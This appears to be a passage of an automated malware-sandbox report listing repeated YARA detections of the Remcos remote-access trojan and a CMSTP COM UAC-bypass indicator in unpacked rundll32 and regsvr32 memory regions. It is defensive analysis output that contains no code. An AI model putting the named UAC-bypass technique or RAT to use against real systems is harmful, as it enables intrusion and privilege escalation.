              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 4.2.rundll32.exe.4df0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.rundll32.exe.2a40000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 3.2.regsvr32.exe.5990000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.4830000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 15.2.regsvr32.exe.2a00000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.rundll32.exe.2b00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.4830000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 4.2.rundll32.exe.4df0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.loaddll32.exe.10ec85b6.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.rundll32.exe.3850000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 25.2.rundll32.exe.2a90000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
